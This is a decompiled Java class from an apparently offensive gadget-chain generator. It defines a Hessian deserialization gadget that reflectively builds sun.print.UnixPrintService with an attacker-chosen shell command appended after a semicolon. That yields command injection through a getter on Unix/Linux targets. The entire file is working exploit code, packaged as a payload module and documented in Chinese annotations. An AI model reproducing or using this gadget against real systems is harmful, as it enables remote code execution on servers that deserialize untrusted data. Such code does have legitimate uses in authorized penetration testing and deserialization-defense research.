package com.ar3h.chains.gadget.impl.hessian.jdk;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.util.OSUtil;
import java.lang.reflect.Constructor;

@GadgetAnnotation(name = "UnixPrintService 命令注入", description = "该类未实现 Serializable，只适用于Hessian反序列化 并且只适用于unix/linux\njdk高版本移除此类\n通过getter方法触发命令注入\n本地测试 zulu8u345 存在此类", dependencies = {"linux"})
@GadgetTags(tags = {Tag.UnixPrintServiceChain, Tag.HessianGetter, Tag.Getter, Tag.NotForJavaSerializable, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/hessian/jdk/UnixPrintService.class */
public class UnixPrintService implements Gadget {

    @Param(name = "Linux命令", description = "eg: calc;")
    public String cmd = "calc;";
    public String methodName = "getQueuedJobCountAIX";
    public String paramName = "queuedJobCountAIX";

    public Object getObject() throws Exception {
        if (OSUtil.isWindows()) {
            throw new RuntimeException("UnixPrintServiceLookup 利用链仅在 Unix/Linux 系统中可用");
        }
        Constructor<?> declaredConstructor = Class.forName("sun.print.UnixPrintService").getDeclaredConstructor(String.class);
        declaredConstructor.setAccessible(true);
        return declaredConstructor.newInstance(";" + this.cmd);
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        gadgetContext.put(ContextTag.SPECIAL_METHOD_NAME_KEY, this.methodName);
        gadgetContext.put(ContextTag.GETTER_PARAM_NAME_KEY, this.paramName);
        return getObject();
    }
}
